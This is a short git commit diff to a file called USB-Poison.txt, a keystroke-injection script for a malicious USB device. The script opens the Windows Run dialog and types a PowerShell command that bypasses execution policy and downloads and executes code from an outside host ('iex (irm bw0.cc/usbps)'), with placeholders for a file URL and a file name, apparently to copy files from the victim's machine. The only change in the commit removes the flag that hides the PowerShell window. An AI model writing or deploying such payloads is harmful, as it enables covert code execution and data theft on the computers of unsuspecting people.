Update USB-Poison.txt

This commit is contained in:
egieb
2025-06-20 11:06:20 +00:00
committed by GitHub
parent 24f3d5905a
commit c998698d9c

View File

@@ -11,6 +11,6 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000 DELAY 1000
GUI r GUI r
DELAY 750 DELAY 750
STRING powershell -Ep Bypass -W H -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' ; iex (irm bw0.cc/usbps) STRING powershell -Ep Bypass -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' ; iex (irm bw0.cc/usbps)
ENTER ENTER